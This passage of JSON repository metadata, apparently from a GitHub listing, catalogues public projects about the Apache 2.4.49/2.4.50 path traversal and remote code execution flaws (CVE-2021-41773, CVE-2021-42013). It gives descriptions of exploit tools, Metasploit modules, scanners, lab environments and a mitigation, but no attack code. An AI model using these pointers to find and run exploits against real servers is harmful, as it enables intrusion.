"login": "wolf1892", + "id": 24608781, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24608781?v=4", + "html_url": "https:\/\/github.com\/wolf1892", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wolf1892\/CVE-2021-41773", + "description": "Setup vulnerable enviornment", + "fork": false, + "created_at": "2021-10-29T06:31:57Z", + "updated_at": "2021-10-29T06:33:41Z", + "pushed_at": "2021-10-29T06:33:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 424762276, + "name": "CVE-2021-41773-Playground", + "full_name": "Hydragyrum\/CVE-2021-41773-Playground", + "owner": { + "login": "Hydragyrum", + "id": 4928181, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4928181?v=4", + "html_url": "https:\/\/github.com\/Hydragyrum", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hydragyrum\/CVE-2021-41773-Playground", + "description": "Some docker images to play with CVE-2021-41773 and CVE-2021-42013", + "fork": false, + "created_at": "2021-11-04T22:52:44Z", + "updated_at": "2024-11-16T17:56:37Z", + "pushed_at": "2021-11-04T22:56:14Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 426066790, + "name": "Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit", + "full_name": "IcmpOff\/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit", + "owner": { + "login": "IcmpOff", + "id": 71145797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71145797?v=4", + "html_url": "https:\/\/github.com\/IcmpOff", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IcmpOff\/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit", + "description": "This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled, it can be used to execute arbitrary commands. This vulnerability has been reintroduced in the Apache 2.4.50 fix (CVE-2021-42013).", + "fork": false, + "created_at": "2021-11-09T02:38:13Z", + "updated_at": "2024-10-17T08:07:25Z", + "pushed_at": "2021-11-09T02:39:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "exploit", + "metasploit", + "metasploit-framework", + "metasploit-modules", + "rce" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427005450, + "name": "CVE-2021-41773", + "full_name": "pirenga\/CVE-2021-41773", + "owner": { + "login": "pirenga", + "id": 10979104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10979104?v=4", + "html_url": "https:\/\/github.com\/pirenga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pirenga\/CVE-2021-41773", + "description": "Ce programme permet de détecter une faille RCE sur les serveurs Apache 2.4.49 et Apache 2.4.50", + "fork": false, + "created_at": "2021-11-11T13:10:05Z", + "updated_at": "2024-08-12T20:18:00Z", + "pushed_at": "2021-11-11T00:48:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 427815832, + "name": "POC-CVE-2021-41773", + "full_name": "kubota\/POC-CVE-2021-41773", + "owner": { + "login": "kubota", + "id": 119277, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119277?v=4", + "html_url": "https:\/\/github.com\/kubota", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kubota\/POC-CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-11-14T02:02:45Z", + "updated_at": "2021-11-16T20:42:27Z", + "pushed_at": "2021-11-16T20:42:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 427956449, + "name": "CVE-2021-41773", + "full_name": "xMohamed0\/CVE-2021-41773", + "owner": { + "login": "xMohamed0", + "id": 94008154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94008154?v=4", + "html_url": "https:\/\/github.com\/xMohamed0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xMohamed0\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-11-14T14:50:45Z", + "updated_at": "2021-11-14T14:55:20Z", + "pushed_at": "2021-11-14T14:55:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 438514241, + "name": "MASS_CVE-2021-41773", + "full_name": "i6c\/MASS_CVE-2021-41773", + "owner": { + "login": "i6c", + "id": 87837042, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87837042?v=4", + "html_url": "https:\/\/github.com\/i6c", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/i6c\/MASS_CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-12-15T06:04:41Z", + "updated_at": "2024-11-10T13:46:50Z", + "pushed_at": "2021-12-15T06:06:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 447314257, + "name": "CVE-2021-41773-exploiter", + "full_name": "norrig\/CVE-2021-41773-exploiter", + "owner": { + "login": "norrig", + "id": 5526261, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5526261?v=4", + "html_url": "https:\/\/github.com\/norrig", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/norrig\/CVE-2021-41773-exploiter", + "description": "School project - Please use other repos for actual testing", + "fork": false, + "created_at": "2022-01-12T17:42:36Z", + "updated_at": "2022-01-12T18:26:57Z", + "pushed_at": "2022-01-13T16:18:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 452242021, + "name": "CVE-2021-41773-exercise", + "full_name": "m96dg\/CVE-2021-41773-exercise", + "owner": { + "login": "m96dg", + "id": 65173648, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65173648?v=4", + "html_url": "https:\/\/github.com\/m96dg", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m96dg\/CVE-2021-41773-exercise", + "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and not earlier versions. Credits to: https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-41773 ", + "fork": false, + "created_at": "2022-01-26T11:02:46Z", + "updated_at": "2022-01-26T11:22:13Z", + "pushed_at": "2022-01-30T19:02:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 464271089, + "name": "CVE-2021-41773", + "full_name": "skentagon\/CVE-2021-41773", + "owner": { + "login": "skentagon", + "id": 49702576, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49702576?v=4", + "html_url": "https:\/\/github.com\/skentagon", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/skentagon\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-02-27T22:39:58Z", + "updated_at": "2024-10-28T08:59:20Z", + "pushed_at": "2024-10-28T08:59:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 467687901, + "name": "CVE-2021-41773", + "full_name": "mauricelambert\/CVE-2021-41773", + "owner": { + "login": "mauricelambert", + "id": 50479118, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50479118?v=4", + "html_url": "https:\/\/github.com\/mauricelambert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mauricelambert\/CVE-2021-41773", + "description": "These Metasploit, Nmap, Python and Ruby scripts detects and exploits CVE-2021-41773 with RCE and local file disclosure.", + "fork": false, + "created_at": "2022-03-08T21:55:53Z", + "updated_at": "2022-03-23T16:56:34Z", + "pushed_at": "2022-03-14T07:34:49Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-41773", + "detection", + "exploit", + "metasploit", + "nmap", + "python3", + "rce", + "ruby", + "scanner", + "vulnerability" + ], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468909402, + "name": "CVE-2021-41773", + "full_name": "the29a\/CVE-2021-41773", + "owner": { + "login": "the29a", + "id": 4436697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4436697?v=4", + "html_url": "https:\/\/github.com\/the29a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/the29a\/CVE-2021-41773", + "description": "Small PoC of CVE-2021-41773", + "fork": false, + "created_at": "2022-03-11T21:50:35Z", + "updated_at": "2022-03-11T21:52:35Z", + "pushed_at": "2022-03-11T22:10:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469203660, + "name": "CVE-2021-41773", + "full_name": "thehackersbrain\/CVE-2021-41773", + "owner": { + "login": "thehackersbrain", + "id": 36809025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36809025?v=4", + "html_url": "https:\/\/github.com\/thehackersbrain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thehackersbrain\/CVE-2021-41773", + "description": "Apache2 2.4.49 - LFI & RCE Exploit - CVE-2021-41773", + "fork": false, + "created_at": "2022-03-12T21:24:55Z", + "updated_at": "2024-11-26T17:30:46Z", + "pushed_at": "2022-03-12T21:30:58Z", + "stargazers_count": 98, + "watchers_count": 98, + "has_discussions": false, + "forks_count": 34, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache2", + "cve-2021-41773", + "exploit", + "gauravraj", + "lfi", + "python", + "rce", + "thehackersbrain" + ], + "visibility": "public", + "forks": 34, + "watchers": 98, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 469576020, + "name": "CVE-2021-41773", + "full_name": "honypot\/CVE-2021-41773", + "owner": { + "login": "honypot", + "id": 101309325, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101309325?v=4", + "html_url": "https:\/\/github.com\/honypot", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/honypot\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-03-14T04:08:56Z", + "updated_at": "2022-03-14T04:09:11Z", + "pushed_at": "2022-03-14T04:09:05Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469821841, + "name": "CVE-2021-41773", + "full_name": "Fa1c0n35\/CVE-2021-41773", + "owner": { + "login": "Fa1c0n35", + "id": 33335488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33335488?v=4", + "html_url": "https:\/\/github.com\/Fa1c0n35", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Fa1c0n35\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-03-14T16:43:49Z", + "updated_at": "2022-03-14T16:44:00Z", + "pushed_at": "2022-03-14T16:43:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 474963195, + "name": "CVE-2021-41773", + "full_name": "puckiestyle\/CVE-2021-41773", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-03-28T11:02:46Z", + "updated_at": "2022-03-28T11:03:00Z", + "pushed_at": "2022-03-28T11:41:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475931011, + "name": "CVE-2021-41773", + "full_name": "zer0qs\/CVE-2021-41773", + "owner": { + "login": "zer0qs", + "id": 83699106, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83699106?v=4", + "html_url": "https:\/\/github.com\/zer0qs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zer0qs\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-03-30T15:04:27Z", + "updated_at": "2022-03-30T17:46:13Z", + "pushed_at": "2022-04-14T21:54:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476112666, + "name": "Reserch-CVE-2021-41773", + "full_name": "DoTuan1\/Reserch-CVE-2021-41773", + "owner": { + "login": "DoTuan1", + "id": 63194321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63194321?v=4", + "html_url": "https:\/\/github.com\/DoTuan1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DoTuan1\/Reserch-CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-03-31T01:48:33Z", + "updated_at": "2022-03-31T01:54:45Z", + "pushed_at": "2022-03-31T03:03:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477111512, + "name": "netsec-polygon", + "full_name": "bernardas\/netsec-polygon", + "owner": { + "login": "bernardas", + "id": 62701131, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62701131?v=4", + "html_url": "https:\/\/github.com\/bernardas", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bernardas\/netsec-polygon", + "description": "Environment for CVE-2021-41773 recreation.", + "fork": false, + "created_at": "2022-04-02T16:34:45Z", + "updated_at": "2022-04-03T08:19:39Z", + "pushed_at": "2022-05-17T22:16:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 477889492, + "name": "Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit", + "full_name": "CalfCrusher\/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit", + "owner": { + "login": "CalfCrusher", + "id": 5812023, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5812023?v=4", + "html_url": "https:\/\/github.com\/CalfCrusher", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CalfCrusher\/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit", + "description": "CVE-2021-41773 | CVE-2021-42013 Exploit Tool (Apache\/2.4.49-2.4.50)", + "fork": false, + "created_at": "2022-04-04T22:07:21Z", + "updated_at": "2024-08-21T17:50:35Z", + "pushed_at": "2022-04-08T09:24:35Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-41773", + "cve-2021-42013", + "exploit" + ], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 478605535, + "name": "cve-2021-41773", + "full_name": "vuongnv3389-sec\/cve-2021-41773", + "owner": { + "login": "vuongnv3389-sec", + "id": 64488431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64488431?v=4", + "html_url": "https:\/\/github.com\/vuongnv3389-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vuongnv3389-sec\/cve-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-04-06T14:53:19Z", + "updated_at": "2022-04-06T14:54:12Z", + "pushed_at": "2022-04-06T15:41:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 480821526, + "name": "CVE-2021-41773", + "full_name": "Chocapikk\/CVE-2021-41773", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-04-12T13:25:58Z", + "updated_at": "2024-08-12T20:22:22Z", + "pushed_at": "2022-04-12T13:26:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 486245191, + "name": "Apache_Penetration_Tool", + "full_name": "wangfly-me\/Apache_Penetration_Tool", + "owner": { + "login": "wangfly-me", + "id": 25388540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25388540?v=4", + "html_url": "https:\/\/github.com\/wangfly-me", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wangfly-me\/Apache_Penetration_Tool", + "description": "CVE-2021-41773&CVE-2021-42013图形化漏洞检测利用工具", + "fork": false, + "created_at": "2022-04-27T15:17:38Z", + "updated_at": "2024-09-05T01:32:23Z", + "pushed_at": "2023-05-22T16:00:49Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-41773", + "cve-2021-42013", + "exp" + ], + "visibility": "public", + "forks": 0, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 491353620, + "name": "CVE-2021-41773-Scanner", + "full_name": "anldori\/CVE-2021-41773-Scanner", + "owner": { + "login": "anldori", + "id": 101538840, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101538840?v=4", + "html_url": "https:\/\/github.com\/anldori", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anldori\/CVE-2021-41773-Scanner", + "description": "CVE-2021-41773 Shodan scanner", + "fork": false, + "created_at": "2022-05-12T03:42:24Z", + "updated_at": "2022-05-12T03:42:49Z", + "pushed_at": "2022-05-12T03:44:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 491523422, + "name": "ApacheRCEEssay", + "full_name": "iosifache\/ApacheRCEEssay", + "owner": { + "login": "iosifache", + "id": 11766982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11766982?v=4", + "html_url": "https:\/\/github.com\/iosifache", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iosifache\/ApacheRCEEssay", + "description": "Essay (and PoCs) about CVE-2021-41773, a remote code execution vulnerability in Apache 2.4.49 🕸️", + "fork": false, + "created_at": "2022-05-12T13:23:08Z", + "updated_at": "2023-02-14T06:59:33Z", + "pushed_at": "2022-05-13T06:10:12Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-41773", + "cve-2021-41773-poc" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 500809753, + "name": "CVE-2021-41773", + "full_name": "Habib0x0\/CVE-2021-41773", + "owner": { + "login": "Habib0x0", + "id": 24976957, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24976957?v=4", + "html_url": "https:\/\/github.com\/Habib0x0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Habib0x0\/CVE-2021-41773", + "description": "CVE-2021-41773 | Apache HTTP Server 2.4.49 is vulnerable to Path Traversal and Remote Code execution attacks ", + "fork": false, + "created_at": "2022-06-07T11:22:08Z", + "updated_at": "2024-02-20T09:21:58Z", + "pushed_at": "2022-12-11T16:02:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 504547542, + "name": "CVE-2021-41773-Apache-RCE", + "full_name": "pwn3z\/CVE-2021-41773-Apache-RCE", + "owner": { + "login": "pwn3z", + "id": 71440287, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71440287?v=4", + "html_url": "https:\/\/github.com\/pwn3z", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pwn3z\/CVE-2021-41773-Apache-RCE", + "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \"require all denied\", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.", + "fork": false, + "created_at": "2022-06-17T13:36:42Z", + "updated_at": "2022-06-17T13:38:47Z", + "pushed_at": "2022-06-17T13:39:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 516684881, + "name": "Mitigation-Apache-CVE-2021-41773-", + "full_name": "EkamSinghWalia\/Mitigation-Apache-CVE-2021-41773-", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/Mitigation-Apache-CVE-2021-41773-", + "description": "Mitigation\/fix of CVE-2021-41773 A Path Traversal And File Disclosure Vulnerability In Apache", + "fork": false, + "created_at": "2022-07-22T09:11:47Z", + "updated_at": "2022-07-22T09:29:20Z", + "pushed_at": "2022-07-22T14:59:37Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 521335808, + "name": "CVE-2021-41773", + "full_name": "Plunder283\/CVE-2021-41773", + "owner": { + "login": "Plunder283", + "id": 87617893, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87617893?v=4", + "html_url": "https:\/\/github.com\/Plunder283", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Plunder283\/CVE-2021-41773", + "description": "CVE-2021-41773 Gaurav Raj's exploit modified by Plunder", + "fork": false, + "created_at": "2022-08-04T16:19:42Z", + "updated_at": "2022-08-04T16:33:22Z", + "pushed_at": "2022-08-04T16:34:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536947281, + "name": "cve-2021-41773", + "full_name": "mightysai1997\/cve-2021-41773", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-41773", + "description": null, + "fork": false, + "created_at": "2022-09-15T09:08:58Z", + "updated_at": "2022-09-15T09:09:16Z", + "pushed_at": "2022-09-15T09:09:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536953912, + "name": "CVE-2021-41773h", + "full_name": "mightysai1997\/CVE-2021-41773h", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773h", + "description": null, + "fork": false, + "created_at": "2022-09-15T09:27:04Z", + "updated_at": "2022-09-15T09:27:22Z", + "pushed_at": "2024-11-19T21:39:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536957144, + "name": "cve-2021-41773-v-", + "full_name": "mightysai1997\/cve-2021-41773-v-", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/cve-2021-41773-v-", + "description": null, + "fork": false, + "created_at": "2022-09-15T09:36:17Z", + "updated_at": "2022-09-15T09:36:35Z", + "pushed_at": "2022-09-15T09:36:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536957769, + "name": "CVE-2021-41773-i-", + "full_name": "mightysai1997\/CVE-2021-41773-i-", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110396758?v=4", + "html_url": "https:\/\/github.com\/mightysai1997", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mightysai1997\/CVE-2021-41773-i-", + "description": null, + "fork": false, + "created_at": "2022-09-15T09:38:04Z", + "updated_at": "2022-09-15T09:38:16Z", + "pushed_at": "2024-09-28T04:32:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 536968315, + "name": "CVE-2021-41773-L-", + "full_name": "mightysai1997\/CVE-2021-41773-L-", + "owner": { + "login": "mightysai1997", + "id": 110396758, + "avatar_url": 